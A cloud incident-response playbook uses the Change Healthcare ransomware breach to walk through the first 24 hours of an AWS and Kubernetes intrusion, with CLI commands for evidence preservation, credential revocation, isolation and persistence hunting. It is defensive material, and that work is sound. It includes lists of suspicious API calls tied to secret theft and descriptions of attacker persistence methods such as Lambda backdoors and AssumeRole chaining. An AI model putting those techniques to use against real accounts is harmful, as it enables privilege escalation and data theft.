The Change Healthcare attack (February 2024) disrupted medical claims processing across the US, involved a reported $22 million ransom payment, and exposed the health data of roughly 190 million Americans; the initial vector was a single set of stolen credentials and a Citrix portal with no MFA
Hours 0–1: declare the incident immediately, scope the blast radius, and start querying CloudTrail — do not investigate quietly
Hours 1–4: contain by revoking credentials and isolating infrastructure, but preserve evidence before any remediation — forensic snapshots and log exports before terminating anything
Hours 4–12: trace lateral movement via AssumeRole chains, identify persistence mechanisms (new IAM users/roles, Lambda backdoors, modified images), and confirm the full data access scope
Hours 12–24: eradicate from known-good baselines, not by patching compromised instances; recover dev → staging → prod; trigger regulatory notification timers

OWASP Mapping: Cross-cutting — incident response is not mapped to a single OWASP category because a breach can enter through any of them. IR quality is the backstop when prevention fails across A01 (broken access control), A07 (authentication failures), A08 (supply chain), and every other vector. The 24-hour window covered here applies regardless of initial entry point.

The Big Picture

┌─────────────────────────────────────────────────────────────────────────┐
│            CLOUD INCIDENT RESPONSE: THE 24-HOUR SEQUENCE                │
│                                                                         │
│  ALERT                                                                  │
│    GuardDuty / Falco / anomaly detection fires                          │
│    ↓                                                                    │
│  TRIAGE  [0–1h]                                                         │
│    Declare incident → scope blast radius → open incident channel        │
│    Is the attacker still active? What data is at risk?                  │
│    ↓                                                                    │
│  CONTAIN  [1–4h]                                                        │
│    Revoke credentials → isolate compute → cordon K8s nodes              │
│    !! Do NOT terminate instances before snapshot !!                     │
│    ↓                                                                    │
│  PRESERVE  [1–4h, parallel with contain]                                │
│    EBS snapshots → CloudTrail log export → VPC Flow export              │
│    Forensic copy before any remediation changes the system state        │
│    ↓                                                                    │
│  INVESTIGATE  [4–12h]                                                   │
│    AssumeRole chain analysis → data access scope → persistence hunt     │
│    eBPF/Falco/Tetragon evidence if available (see EP11)                 │
│    ↓                                                                    │
│  ERADICATE  [12–24h]                                                    │
│    Remove persistence → rotate ALL credentials in blast radius          │
│    Replace compromised instances from known-good hardened AMI           │
│    ↓                                                                    │
│  RECOVER  [12–24h]                                                      │
│    dev → staging → prod sequence. Never prod-first.                     │
│    Verify monitoring before declaring all-clear                         │
│    ↓                                                                    │
│  LEARN                                                                  │
│    Post-incident review → timeline → regulatory notifications           │
│    Update playbook before the next incident                             │
└─────────────────────────────────────────────────────────────────────────┘

A cloud incident response playbook that exists only as a document is not an incident response capability. The sequence above is only useful if your team has rehearsed it — run it as a tabletop, run it in a chaos exercise, run it on a simulated breach in a non-prod account. The first time through this sequence should not be during an actual breach.

The Incident: Change Healthcare (February 2024)

On February 21, 2024, a ransomware attack hit Change Healthcare, a UnitedHealth Group subsidiary that processes roughly 50% of US medical claims. By the time containment completed, the damage was:

$22 billion in medical claims processing disrupted
190 million Americans’ health data potentially exposed
Hospitals unable to process insurance claims for weeks — some faced payroll crises because they couldn’t get reimbursed for care already delivered
A $22 million ransom paid to ALPHV/BlackCat, followed by ALPHV exit-scamming the affiliate (keeping the ransom), followed by RansomHub re-extorting with the same data

The initial vector: a Citrix remote access portal with no MFA enforced. A single set of stolen credentials. That’s it.

What made the outcome as severe as it was: the attackers had nine days of dwell time before the ransomware detonated. Nine days of lateral movement, data staging, and backup discovery before detonation. The first 24 hours after detection determine whether you contain an intrusion or respond to a full-scale breach. The Change Healthcare team was responding to a full-scale breach because the first 24 hours happened nine days before anyone knew there was an incident.

Incident response quality tracks preparation investment directly. Teams that contain in four hours practiced containing in four hours. Teams that discover they have no forensic evidence discover that during the investigation, not before it.

Hour 0–1: Detect and Declare

Step 1: Declare — Do Not Investigate Quietly

The instinct when something looks suspicious is to investigate before escalating. That instinct is wrong in cloud incidents. Every minute of quiet investigation is a minute the attacker may be escalating privileges, staging data, or discovering your backups.

Declare the incident immediately. The threshold for declaration is suspicion, not confirmation.

Who to notify in the first 15 minutes:
– CISO (or on-call security lead)
– Legal counsel (regulatory clock starts now; you need legal involved from minute one)
– On-call SRE lead (you will need infrastructure access)
– Communications lead (if external-facing systems are involved)

Operational setup:
1. Create a dedicated incident Slack channel: #incident-YYYY-MM-DD-brief-descriptor
2. Start an incident log — a shared doc, timestamped, with every action taken and by whom. This becomes your evidence log and your regulatory submission document.
3. Assign a scribe. The incident commander should not also be taking notes.
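
The incident log and channel naming described above can be scripted so that nobody formats timestamps by hand mid-incident. The following is a minimal sketch, not part of the original playbook: `ir_log`, `incident_channel`, and the `IR_LOG` path are hypothetical names chosen for illustration, and the tab-separated layout is just one reasonable choice.

```shell
#!/usr/bin/env bash
# Hypothetical helpers for the incident log; names and paths are assumptions.
IR_LOG="${IR_LOG:-./ir-evidence/incident-log.tsv}"

# Append one entry: UTC timestamp, actor, free-text action (tab-separated).
ir_log() {
  local actor="$1"; shift
  mkdir -p "$(dirname "${IR_LOG}")"
  printf '%s\t%s\t%s\n' "$(date -u +%Y-%m-%dT%H:%M:%SZ)" "${actor}" "$*" >> "${IR_LOG}"
}

# Build a channel name in the #incident-YYYY-MM-DD-descriptor form.
incident_channel() {
  local descriptor
  # Lowercase, collapse every run of non-alphanumerics into one hyphen,
  # then trim a leading or trailing hyphen.
  descriptor=$(printf '%s' "$*" | tr '[:upper:]' '[:lower:]' \
    | tr -cs 'a-z0-9' '-' | sed 's/^-//; s/-$//')
  printf '#incident-%s-%s\n' "$(date -u +%Y-%m-%d)" "${descriptor}"
}

# Example usage (commented out so sourcing this file has no side effects):
#   incident_channel "suspicious AssumeRole"
#   ir_log "scribe" "Incident declared, channel created"
```

Logging in UTC avoids arguments about time zones later, when the same file is read alongside CloudTrail timestamps.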

Step 2: Scope the Blast Radius

Before touching anything, answer three questions:

Is the attacker still active? (Is this ongoing or historical?)
What is the potential blast radius? (Which accounts, regions, services, principals are in scope?)
What data is at risk? (PII, PHI, credentials, intellectual property; which of it carries regulatory implications?)

Step 3: Initial CloudTrail Query

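# Run this before touching anything so you have a clean baseline.
# Note: for assumed-role sessions, the Username lookup attribute matches the
# role session name, not the role name.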
aws cloudtrail lookup-events \
  --lookup-attributes AttributeKey=Username,AttributeValue=suspected-role \
  --start-time $(date -d '1 hour ago' --iso-8601=seconds) \
  --query 'Events[*].[EventTime,EventName,Resources[0].ResourceName]' \
  --output table

# If you don't know the principal yet — look for unusual API activity
# across all principals in the last hour
aws cloudtrail lookup-events \
  --start-time $(date -d '1 hour ago' --iso-8601=seconds) \
  --query 'Events[*].{Time:EventTime,User:Username,Event:EventName,Source:EventSource}' \
  --output json | \
  jq 'sort_by(.Time) | reverse | .[:50]'
# Look for: CreateUser, AttachRolePolicy, PutRolePolicy, CreateAccessKey,
#           GetSecretValue, ListBuckets, DescribeInstances in rapid succession

# Check GuardDuty for the triggering finding
DETECTOR_ID=$(aws guardduty list-detectors --query 'DetectorIds[0]' --output text)

aws guardduty get-findings \
  --detector-id "${DETECTOR_ID}" \
  --finding-ids $(aws guardduty list-findings \
    --detector-id "${DETECTOR_ID}" \
    --finding-criteria '{
      "Criterion": {
        "updatedAt": {"Gte": '$(date -d '24 hours ago' +%s000)'}
      }
    }' \
    --sort-criteria '{"AttributeName":"updatedAt","OrderBy":"DESC"}' \
    --max-results 10 \
    --query 'FindingIds' --output text) | \
  jq '.Findings[] | {type: .Type, severity: .Severity, time: .UpdatedAt, detail: .Description}'

Hour 1–4: Contain Without Destroying Evidence

The central tension in early containment: you need to stop the bleeding, but you also need the evidence. Terminating a compromised EC2 instance stops the threat on that instance — it also destroys the process table, network connections, in-memory artifacts, and filesystem state that the investigation needs.

The order of operations:
1. Preserve (snapshot, export logs)
2. Contain (revoke credentials, isolate network)
3. Never terminate before step 1

Evidence Preservation (Before Any Containment Action)

# Create EBS snapshots of ALL volumes on compromised instances
# Do this FIRST — before network isolation, before anything
aws ec2 describe-instances \
  --instance-ids i-compromised-instance-id \
  --query 'Reservations[].Instances[].BlockDeviceMappings[].Ebs.VolumeId' \
  --output text | tr '\t' '\n' | \
  while read vol_id; do
    echo "Snapshotting volume: ${vol_id}"
    aws ec2 create-snapshot \
      --volume-id "${vol_id}" \
      --description "IR evidence - $(date --iso-8601) - ${vol_id}" \
      --tag-specifications "ResourceType=snapshot,Tags=[{Key=incident,Value=active},{Key=preserve,Value=legal-hold}]"
  done

# Export CloudTrail logs for the incident window to a local IR evidence directory
# Use a time window that starts 24 hours before the suspected compromise
# (here: compromise suspected on 2024-02-21, so the export starts at 02/20)
aws s3 sync \
  s3://your-cloudtrail-bucket/AWSLogs/123456789012/CloudTrail/ \
  ./ir-evidence/cloudtrail/ \
  --exclude "*" \
  --include "*/2024/02/20/*" \
  --include "*/2024/02/21/*" \
  --include "*/2024/02/22/*"

# Export VPC Flow Logs for the incident window
# These show network connections that CloudTrail doesn't capture
# (wrapping message in [] makes text output print one record per line)
aws logs filter-log-events \
  --log-group-name /aws/vpc/flowlogs \
  --start-time $(date -d '24 hours ago' +%s000) \
  --end-time $(date +%s000) \
  --query 'events[*].[message]' \
  --output text > ./ir-evidence/vpc-flow-logs.txt

Containment Action 1: Revoke the Compromised Credential

# Option A: Disable an IAM user's access key (reversible — preserves key for forensics)
aws iam update-access-key \
  --user-name compromised-user \
  --access-key-id AKIAIOSFODNN7EXAMPLE \
  --status Inactive

# Option B: If the compromised principal is an IAM role —
# attach a deny-all inline policy (fastest, takes effect immediately)
aws iam put-role-policy \
  --role-name compromised-role \
  --policy-name incident-deny-all \
  --policy-document '{
    "Version": "2012-10-17",
    "Statement": [
      {
        "Sid": "IncidentDenyAll",
        "Effect": "Deny",
        "Action": "*",
        "Resource": "*"
      }
    ]
  }'

# Option C: Revoke only the sessions that already exist
# (the deny-all in Option B blocks every session of the role, old and new,
#  as soon as it is attached; this variant denies only tokens issued before
#  the cutoff, so legitimate services can re-assume the role and keep working)
aws iam put-role-policy \
  --role-name compromised-role \
  --policy-name incident-revoke-older-sessions \
  --policy-document '{
    "Version": "2012-10-17",
    "Statement": [
      {
        "Effect": "Deny",
        "Action": "*",
        "Resource": "*",
        "Condition": {
          "DateLessThan": {
            "aws:TokenIssueTime": "'$(date -u +%Y-%m-%dT%H:%M:%SZ)'"
          }
        }
      }
    ]
  }'
# This denies all requests where the token was issued before right now,
# effectively invalidating all existing sessions for this role.
# An attacker who can still call AssumeRole gets a fresh, working session,
# so fix the trust policy or the source credential as well.

Containment Action 2: Isolate Affected EC2 Instances

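# Create an isolation security group: no ingress, no egress
# except SSH from your IR bastion (for forensic access if needed)
ISOLATION_SG=$(aws ec2 create-security-group \
  --group-name "incident-isolation-$(date +%Y%m%d)" \
  --description "Incident isolation - no network access except IR bastion" \
  --vpc-id vpc-your-vpc-id \
  --query 'GroupId' \
  --output text)

# A new security group starts with an allow-all egress rule; remove it,
# otherwise the instance can still open outbound connections
aws ec2 revoke-security-group-egress \
  --group-id "${ISOLATION_SG}" \
  --ip-permissions '[{"IpProtocol":"-1","IpRanges":[{"CidrIp":"0.0.0.0/0"}]}]'

echo "Isolation SG created: ${ISOLATION_SG}"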

# Add ingress rule: only from IR bastion (for forensic access)
# Remove this rule entirely if you don't need it
aws ec2 authorize-security-group-ingress \
  --group-id "${ISOLATION_SG}" \
  --protocol tcp \
  --port 22 \
  --cidr YOUR-IR-BASTION-IP/32

# Apply the isolation SG to the compromised instance
# This replaces all existing security groups — the instance is now isolated
aws ec2 modify-instance-attribute \
  --instance-id i-compromised-instance-id \
  --groups "${ISOLATION_SG}"

Important: Do not terminate the instance. The isolated instance remains available for forensic analysis via the IR bastion. Termination destroys volatile evidence. You terminate after the investigation is complete and legal has cleared the evidence for destruction.

Containment Action 3: Kubernetes — Cordon, Don’t Delete

# Cordon the compromised node — prevents new pod scheduling
kubectl cordon node/compromised-node-name

# Label the node for IR tracking
kubectl label node/compromised-node-name incident=active preserve=legal-hold

# If a specific pod is the concern — do NOT kubectl delete pod
# Instead, collect forensic information first
POD_NAME="compromised-pod"
NAMESPACE="production"

# Capture the full pod spec and status
kubectl get pod "${POD_NAME}" -n "${NAMESPACE}" -o json > \
  ./ir-evidence/pod-spec-${POD_NAME}.json

# Capture environment variables (may contain credential evidence)
kubectl exec "${POD_NAME}" -n "${NAMESPACE}" -- env > \
  ./ir-evidence/pod-env-${POD_NAME}.txt 2>/dev/null

# Capture running processes
kubectl exec "${POD_NAME}" -n "${NAMESPACE}" -- ps auxf > \
  ./ir-evidence/pod-processes-${POD_NAME}.txt 2>/dev/null

# Capture network connections
kubectl exec "${POD_NAME}" -n "${NAMESPACE}" -- ss -tunapw > \
  ./ir-evidence/pod-netstat-${POD_NAME}.txt 2>/dev/null

# Now you can delete the pod if needed — you have the evidence

Hour 4–12: Investigate the Blast Radius

Containment stops the active threat. Investigation answers: what did they do, where did they go, and what did they touch?

Trace the Lateral Movement

The most important lateral movement mechanism in AWS is AssumeRole chaining — a compromised principal assumes a role, which has permissions to assume another role, building a privilege escalation path. IAM attack path reconstruction requires following this chain through CloudTrail.

# Find all AssumeRole events from the compromised principal
# This shows every role the attacker assumed after initial compromise
aws cloudtrail lookup-events \
  --lookup-attributes AttributeKey=EventName,AttributeValue=AssumeRole \
  --start-time "2024-02-21T00:00:00Z" \
  --end-time "2024-02-22T23:59:59Z" \
  --output json | \
  jq '.Events[] | 
    (.CloudTrailEvent | fromjson) | 
    select((.userIdentity.arn // "") | contains("compromised-role")) | 
    {
      time: .eventTime,
      caller: .userIdentity.arn,
      assumed_role: .requestParameters.roleArn,
      session_name: .requestParameters.roleSessionName,
      source_ip: .sourceIPAddress
    }'

# Follow the chain — get ALL roles assumed during the incident window
# regardless of source, then trace connections manually
aws cloudtrail lookup-events \
  --lookup-attributes AttributeKey=EventName,AttributeValue=AssumeRole \
  --start-time "2024-02-21T00:00:00Z" \
  --end-time "2024-02-22T23:59:59Z" \
  --output json | \
  jq -r '.Events[] | 
    (.CloudTrailEvent | fromjson) | 
    [.eventTime, .userIdentity.arn, .requestParameters.roleArn, .sourceIPAddress] | 
    @tsv' | \
  sort -k1
# Build the graph manually: which ARN called AssumeRole for which target role
# Any role not in your expected deployment automation is suspicious
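
Building the graph by hand gets slow once the window contains hundreds of AssumeRole events. The sketch below is one way to automate the first pass, under stated assumptions: `trace_chain` is a hypothetical helper, it reads the time-sorted, tab-separated rows produced by the query above (time, caller ARN, target role ARN, source IP), and it treats a role as reached once any already-reached principal has assumed it. The caller of a chained call appears as an `assumed-role` ARN while the target appears as a `role` ARN, so both are normalized before comparison.

```shell
#!/usr/bin/env bash
# Hypothetical helper: follow AssumeRole hops outward from one seed principal.
# stdin: time-sorted TSV rows of time, caller ARN, target role ARN, source IP
# $1:    ARN of the principal known to be compromised
trace_chain() {
  awk -F '\t' -v seed="$1" '
    # Reduce a caller or role ARN to "ACCOUNT:role/NAME" so that
    # arn:aws:sts::A:assumed-role/NAME/session and arn:aws:iam::A:role/NAME match.
    function principal(arn,    parts, seg, n) {
      split(arn, parts, ":")
      n = split(parts[6], seg, "/")
      if (seg[1] == "assumed-role") return parts[5] ":role/" seg[2]
      if (seg[1] == "role")         return parts[5] ":role/" seg[n]
      return parts[5] ":" parts[6]
    }
    BEGIN { tainted[principal(seed)] = 1 }
    {
      caller = principal($2)
      target = principal($3)
      # Rows are time-sorted, so one pass is enough: a hop can only start
      # from a principal that was reached earlier in the file.
      if (caller in tainted) {
        tainted[target] = 1
        printf "%s\t%s -> %s\t%s\n", $1, caller, target, $4
      }
    }'
}
```

Each output row is one hop in the suspected chain. This only sees events present in the input, so hops made inside another account need that account's CloudTrail rows merged in before sorting.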

Find What Data Was Accessed

# S3 GetObject events: every object the attacker read
# NOTE: S3 data events are NOT enabled by default in CloudTrail, and
# lookup-events (Event history) never returns data events even when they are.
# Read them from the trail's log files instead, here the copy exported to
# ./ir-evidence/cloudtrail/ earlier (assumes that trail logs S3 data events)
find ./ir-evidence/cloudtrail -name '*.json.gz' -exec gzip -dc {} + | \
  jq '.Records[] | 
    select(.eventName == "GetObject") | 
    {
      time: .eventTime,
      user: .userIdentity.arn,
      bucket: .requestParameters.bucketName,
      key: .requestParameters.key,
      source_ip: .sourceIPAddress
    }'

# Secrets Manager — what secrets were accessed?
aws cloudtrail lookup-events \
  --lookup-attributes AttributeKey=EventName,AttributeValue=GetSecretValue \
  --start-time "2024-02-21T00:00:00Z" \
  --output json | \
  jq '.Events[] | 
    (.CloudTrailEvent | fromjson) | 
    {
      time: .eventTime,
      user: .userIdentity.arn,
      secret: .requestParameters.secretId,
      source_ip: .sourceIPAddress
    }'

# KMS — what was decrypted?
aws cloudtrail lookup-events \
  --lookup-attributes AttributeKey=EventName,AttributeValue=Decrypt \
  --start-time "2024-02-21T00:00:00Z" \
  --output json | \
  jq '.Events[] | 
    (.CloudTrailEvent | fromjson) | 
    {
      time: .eventTime,
      user: .userIdentity.arn,
      key_id: .requestParameters.keyId,
      source_ip: .sourceIPAddress
    }'

Hunt for Persistence Mechanisms

Attackers establish persistence before detonating ransomware or before exfiltrating at scale. The most common persistence mechanisms in AWS:

# New IAM users created during the incident window
aws iam list-users \
  --query 'Users[?CreateDate>=`2024-02-21T00:00:00Z`].[UserName,CreateDate,UserId]' \
  --output table

# New IAM roles created during the incident window
aws iam list-roles \
  --query 'Roles[?CreateDate>=`2024-02-21T00:00:00Z`].[RoleName,CreateDate,RoleId]' \
  --output table

# New IAM access keys created for existing users
aws cloudtrail lookup-events \
  --lookup-attributes AttributeKey=EventName,AttributeValue=CreateAccessKey \
  --start-time "2024-02-21T00:00:00Z" \
  --output json | \
  jq '.Events[] | (.CloudTrailEvent | fromjson) | {time: .eventTime, user: .requestParameters.userName, by: .userIdentity.arn}'

# Lambda functions with recent code modifications
# (Lambda is a common backdoor target — function code is easy to modify)
aws lambda list-functions \
  --query 'Functions[?LastModified>=`2024-02-21`].[FunctionName,LastModified,Runtime]' \
  --output table

# For any recently modified function — check for unexpected environment variables
aws lambda get-function-configuration \
  --function-name suspicious-function-name \
  --query '{env: Environment.Variables, role: Role, handler: Handler}'

# CloudFormation stacks created or modified during incident window
aws cloudtrail lookup-events \
  --lookup-attributes AttributeKey=EventName,AttributeValue=CreateStack \
  --start-time "2024-02-21T00:00:00Z" \
  --output json | \
  jq '.Events[] | (.CloudTrailEvent | fromjson) | {time: .eventTime, stack: .requestParameters.stackName, by: .userIdentity.arn}'

# EC2 user-data modifications (backdoor via user data on restart)
aws cloudtrail lookup-events \
  --lookup-attributes AttributeKey=EventName,AttributeValue=ModifyInstanceAttribute \
  --start-time "2024-02-21T00:00:00Z" \
  --output json | \
  jq '.Events[] | (.CloudTrailEvent | fromjson) | select((.requestParameters // {}) | has("userData")) | {time: .eventTime, instance: .requestParameters.instanceId, by: .userIdentity.arn}'

eBPF and Falco Evidence (If Available)

If your environment runs Falco or Cilium Tetragon (see detection engineering with eBPF), the kernel-level telemetry from EP11 is now forensic evidence:

# Tetragon: export process execution events for the incident window
# Tetragon writes to /var/log/tetragon/tetragon.log by default
# Filter by the time window and affected pod/node

# On the affected node (or via log aggregation if you ship to a SIEM):
cat /var/log/tetragon/tetragon.log | \
  jq 'select(.time >= "2024-02-21T00:00:00Z" and .time <= "2024-02-22T23:59:59Z") |
    select(.process_exec != null) |
    {
      time: .time,
      pod: .process_exec.process.pod.name,
      ns: .process_exec.process.pod.namespace,
      binary: .process_exec.process.binary,
      args: .process_exec.process.arguments,
      parent: .process_exec.parent.binary
    }' | head -100

# Falco: pull alerts from the incident window out of your SIEM/log store
# If you're running Falco with file output:
grep "2024-02-21\|2024-02-22" /var/log/falco/events.json | \
  jq 'select(.priority == "Critical" or .priority == "Error") |
    {time: .time, rule: .rule, output: .output, pod: .output_fields."k8s.pod.name"}' | \
  head -50

Process lineage from Tetragon (which parent process spawned which child) is often the clearest signal of container escape or lateral movement within a cluster. It shows attack paths that API-layer logging cannot reconstruct.

Hour 12–24: Eradicate and Recover

Remove Persistence

Work through the persistence findings from the investigation phase in order:

# Delete unauthorized IAM users created during the incident
# First: disable their access keys
aws iam list-access-keys --user-name attacker-created-user \
  --query 'AccessKeyMetadata[].AccessKeyId' --output text | \
  tr '\t' '\n' | \
  while read key_id; do
    aws iam update-access-key --user-name attacker-created-user \
      --access-key-id "${key_id}" --status Inactive
  done

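# Then: detach managed policies, delete inline policies, remove from groups,
# delete the login profile and access keys, and only then delete the user.
# delete-user fails with DeleteConflict while any of these remain.
aws iam detach-user-policy --user-name attacker-created-user \
  --policy-arn arn:aws:iam::123456789012:policy/attached-policy
aws iam delete-login-profile --user-name attacker-created-user
aws iam delete-access-key --user-name attacker-created-user \
  --access-key-id AKIAIOSFODNN7EXAMPLE   # repeat for each key listed above
aws iam delete-user --user-name attacker-created-user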

# Rotate ALL credentials that could have been accessed during the incident window
# Not just the initial compromise — every secret in the blast radius

# List all IAM user access keys in the affected account
aws iam list-users --query 'Users[].UserName' --output text | tr '\t' '\n' | \
  while read user; do
    aws iam list-access-keys --user-name "${user}" \
      --query 'AccessKeyMetadata[?Status==`Active`].{User:UserName,Key:AccessKeyId}' \
      --output json
  done | jq -s 'flatten'
# For each key: create new key → update application config → delete old key

# Remove Lambda backdoors — restore from last known-good deployment
# Do NOT patch the modified function — replace the entire deployment package
aws lambda update-function-code \
  --function-name backdoored-function \
  --s3-bucket your-code-bucket \
  --s3-key known-good/function-v1.2.3.zip

# Reset environment variables (remove anything added during incident)
aws lambda update-function-configuration \
  --function-name backdoored-function \
  --environment 'Variables={EXPECTED_VAR=expected_value}'

Replace Compromised Instances From Known-Good Baselines

Do not patch a compromised instance and return it to production. The instance’s integrity is unknown — the attacker may have modified binaries, installed kernel modules, or altered the init system in ways that a filesystem scan won’t catch.

Replace from a known-good hardened image:

# Launch a replacement from a hardened baseline AMI
# If you're running a Stratum-built image pipeline, this is where it pays off:
# you have a signed, hardened, versioned AMI to replace from

aws ec2 run-instances \
  --image-id ami-known-good-hardened-baseline \
  --instance-type t3.medium \
  --subnet-id subnet-your-private-subnet \
  --security-group-ids sg-your-normal-sg \
  --iam-instance-profile Name=your-instance-profile \
  --tag-specifications \
    'ResourceType=instance,Tags=[{Key=Name,Value=replacement-post-incident},{Key=incident-id,Value=2024-02-21}]' \
  --user-data file://init-script.sh

If you don’t have a hardened AMI pipeline, this incident is the forcing function to build one. Rebuilding from a generic AMI means re-running your full configuration management stack and hoping nothing drifts. Rebuilding from a known-good hardened baseline means launching and verifying.

Recovery Sequence

dev → staging → prod

Not prod first. Not all at once.

Bring dev back up. Verify monitoring and alerting are functional — specifically, verify that the detection that fired during this incident still fires in dev. If you can’t reproduce the detection in dev, you don’t know if it’s working.

Promote to staging. Run your standard smoke tests plus whatever you added to your detection suite based on this incident.

Promote to prod only after staging has been clean for at least four hours.

The Post-Incident Review

Schedule it within 72 hours of resolution. Not a blame session — a timeline reconstruction and process improvement meeting. What to document:

Timeline reconstruction (to the minute):

Time	Event	Who	Evidence Source
Feb 21 12:47	Initial compromise — credential used from unexpected IP	Attacker	CloudTrail
Feb 21 12:51	First AssumeRole to production role	Attacker	CloudTrail
Feb 21 13:15	First S3 GetObject on customer-data bucket	Attacker	CloudTrail data events
Feb 21 21:30	GuardDuty fires: UnauthorizedAccess:IAMUser/AnomalousBehavior	GuardDuty	GuardDuty finding
Feb 21 21:35	On-call engineer acknowledges alert	SRE	PagerDuty
Feb 21 21:50	Incident declared, channel created	IR lead	Slack

Key metrics to measure and improve:

Mean Time to Detect (MTTD): Time between initial compromise and first alert
Mean Time to Declare (MTTDeclare): Time between first alert and formal incident declaration
Mean Time to Contain (MTTC): Time between declaration and credential revocation + network isolation
Blast radius: Accounts, services, data classifications confirmed in scope
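
As a worked example, the sample timeline above gives two of these numbers directly. This is a minimal sketch: `minutes_between` is a hypothetical helper, the year 2024 is assumed because the table omits it, and it relies on GNU `date` (the same `date -d` used in the earlier commands). The sample timeline has no containment timestamp, so MTTC is left out.

```shell
#!/usr/bin/env bash
# Whole minutes between two ISO 8601 timestamps (requires GNU date).
minutes_between() {
  local start end
  start=$(date -u -d "$1" +%s)
  end=$(date -u -d "$2" +%s)
  echo $(( (end - start) / 60 ))
}

# Timestamps taken from the sample timeline; the year is an assumption.
COMPROMISE="2024-02-21T12:47:00Z"
FIRST_ALERT="2024-02-21T21:30:00Z"
DECLARED="2024-02-21T21:50:00Z"

echo "Time to detect:  $(minutes_between "$COMPROMISE" "$FIRST_ALERT") min"   # 523 min (8h43m)
echo "Time to declare: $(minutes_between "$FIRST_ALERT" "$DECLARED") min"     # 20 min
```

One incident yields one sample per metric; the "mean" only becomes meaningful once the same calculation is recorded across several incidents or exercises.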

Regulatory notification requirements (know these before the incident):

GDPR: 72 hours from discovery to supervisory authority notification
HIPAA: 60 days from discovery to individual notification; 60 days to HHS for breaches affecting 500+ individuals
CCPA: “expedient” notification to individuals; no fixed statutory window for regulator notification but AG guidance suggests 72 hours
SEC (public companies): 4 business days from determining the incident is “material”
Check your state breach notification laws — 50 states, 50 different windows
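
The fixed-length windows above can be turned into concrete timestamps as soon as a discovery time is logged. A minimal sketch, assuming GNU `date`: `deadline_after` is a hypothetical helper, and the discovery time used here is simply the first alert from the sample timeline. What counts as "discovery" is a legal determination, and the SEC window runs from the materiality decision, so it is not computed here.

```shell
#!/usr/bin/env bash
# Print the UTC timestamp N hours after a given ISO 8601 time (GNU date).
# Adding seconds to the epoch avoids ambiguous "+N hours" string parsing.
deadline_after() {
  local discovered_epoch
  discovered_epoch=$(date -u -d "$1" +%s)
  date -u -d "@$(( discovered_epoch + $2 * 3600 ))" +%Y-%m-%dT%H:%M:%SZ
}

# Assumed discovery time for illustration; legal counsel decides the real one.
DISCOVERED="2024-02-21T21:30:00Z"

echo "GDPR supervisory authority (72h): $(deadline_after "$DISCOVERED" 72)"
echo "HIPAA outer limit (60 days):      $(deadline_after "$DISCOVERED" $((60 * 24)))"
```

Writing the computed deadlines into the incident log at declaration time gives legal and the incident commander the same clock.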

⚠ Production Gotchas

Revoking a credential mid-operation breaks running jobs. If the compromised IAM role is used by production services, the deny-all policy will immediately break those services. Have a plan for emergency credential rotation before you act — either a separate role for legitimate services or a maintenance window. The contain-vs-service-availability tradeoff is a real one; make it deliberately, document it in the incident log.

CloudTrail data events are not enabled by default. Management events (API calls like CreateUser, RunInstances, AssumeRole) are enabled. Data events (S3 GetObject, Lambda function invocations, DynamoDB item-level activity) must be explicitly enabled and cost extra. If you discover during an incident that you needed S3 data events and didn’t have them, you cannot reconstruct what data the attacker accessed. Enable them before the incident.

Forensic snapshots cost money. EBS snapshot storage is not free, and snapshotting every volume on every compromised instance adds up. Have a pre-approved IR budget that includes forensic snapshot costs — getting financial approval in the middle of an active incident is a delay you don’t want.

Legal hold means don’t delete anything. Once legal is involved, no evidence can be destroyed without legal clearance. That includes the compromised EC2 instances, the forensic snapshots, the log exports, and the incident Slack channel. Set legal-hold tags on all IR artifacts immediately and don’t clean up until legal explicitly says to.

The attacker may still be in. Containment removes one credential and one network path. If the attacker established multiple persistence mechanisms before you detected them, containment is the beginning of the eradication phase, not the end. Assume they’re still in until the persistence hunt is complete.

Multi-account blast radius compounds quickly. AssumeRole chains can cross account boundaries. A compromised role in account A that can assume a role in account B means the blast radius spans both accounts, and CloudTrail logging in account A does not show what the attacker did after assuming the role in account B. Pull CloudTrail from every account in the blast radius.
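
To decide which accounts to pull CloudTrail from, the target role ARNs in the AssumeRole output already carry the account IDs. A small sketch, assuming the same tab-separated rows as the investigation queries (time, caller ARN, target role ARN, source IP); `accounts_in_scope` is a hypothetical name.

```shell
#!/usr/bin/env bash
# Distinct account IDs that appear as AssumeRole targets.
# stdin: TSV rows of time, caller ARN, target role ARN, source IP
accounts_in_scope() {
  # Field 3 is the target role ARN; the account ID is its fifth
  # colon-separated component (arn:aws:iam::ACCOUNT:role/NAME).
  cut -f3 | awk -F: 'NF >= 5 && $5 != "" { print $5 }' | sort -u
}
```

Every account ID in the output other than the one where the incident started is an account whose own CloudTrail needs to be collected.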

Quick Reference: IR Checklist — First 24 Hours

Hour 0–1: Declare and Scope

[ ] Declare incident — do not investigate quietly
[ ] Notify: CISO, Legal, on-call SRE lead
[ ] Create incident Slack channel: #incident-YYYY-MM-DD-descriptor
[ ] Start timestamped incident log (shared doc, assign scribe)
[ ] Query CloudTrail: last 1–2 hours of suspected principal activity
[ ] Check GuardDuty for active findings
[ ] Answer: active or historical? blast radius? data at risk?

Hour 1–4: Preserve, Then Contain

[ ] FIRST: Snapshot all volumes on compromised EC2 instances
[ ] FIRST: Export CloudTrail logs for incident window to IR evidence directory
[ ] FIRST: Export VPC Flow Logs for incident window
[ ] Revoke compromised IAM credential (disable key or attach deny-all policy)
[ ] For role sessions: use DateLessThan condition to invalidate active sessions
[ ] Apply isolation security group to compromised EC2 instances (do NOT terminate)
[ ] Cordon compromised Kubernetes nodes (do NOT delete pods before forensic capture)
[ ] Collect pod forensics: spec, env vars, process list, network connections

Hour 4–12: Investigate

[ ] Trace AssumeRole chain from compromised principal — build the lateral movement graph
[ ] Query S3 GetObject, GetSecretValue, Decrypt events for data access scope
[ ] Hunt persistence: new IAM users/roles, new access keys, Lambda modifications
[ ] Check EC2 user-data modifications, new CloudFormation stacks
[ ] Pull Tetragon/Falco evidence if available — process lineage and connection logs
[ ] Cross-account check: pull CloudTrail from every account reached via AssumeRole

Hour 12–24: Eradicate and Recover

[ ] Delete all unauthorized IAM users/roles/access keys created during incident
[ ] Rotate ALL credentials in the blast radius (not just the initial compromise)
[ ] Remove Lambda backdoors — replace entire deployment package, reset environment
[ ] Replace compromised instances from known-good hardened AMI (do not patch-in-place)
[ ] Recover: dev → staging → prod. Verify detection fires in dev before promoting.
[ ] Declare all-clear only after monitoring shows clean in prod for 4+ hours

Ongoing: Regulatory and Communication

[ ] Log discovery time — regulatory clocks (GDPR 72h, HIPAA 60d) start at discovery
[ ] Legal hold on all IR artifacts — do not delete without legal clearance
[ ] Schedule post-incident review within 72 hours of resolution
[ ] Update this playbook before the next incident

